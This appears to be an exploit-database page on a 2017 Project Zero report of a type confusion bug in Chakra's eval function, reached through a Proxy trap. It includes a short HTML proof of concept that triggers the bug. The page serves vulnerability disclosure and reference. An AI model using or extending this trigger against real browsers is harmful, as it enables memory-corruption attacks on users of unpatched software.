header-logo
Suggest Exploit
vendor:
Chakra
by:
Project Zero
7,5
CVSS
HIGH
Type Confusion
843
CWE
Product Name: Chakra
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2017

Type Confusion in Chakra’s eval Function

In Chakra, function calls can sometimes take an extra internal argument, using the flag CallFlags_ExtraArg. The global eval function makes assumptions about the type of this extra arg, and casts it to a FrameDisplay object. If eval is called from a location in code where an extra parameter is added, for example, a Proxy function trap, and the extra parameter is of a different type, this can lead to type confusion.

Mitigation:

Ensure that the extra argument passed to the eval function is of the expected type.
Source

Exploit-DB raw data:

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=948

In Chakra, function calls can sometimes take an extra internal argument, using the flag CallFlags_ExtraArg. The global eval function makes assumptions about the type of this extra arg, and casts it to a FrameDisplay object. If eval is called from a location in code where an extra parameter is added, for example, a Proxy function trap, and the extra parameter is of a different type, this can lead to type confusion. A full PoC is as follows and attached:

var p = new Proxy(eval, {});
p("alert(\"e\")"); 
-->

<html>
<body>
<script>
var p = new Proxy(eval, {});
p("alert(\"e\")");
</script>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR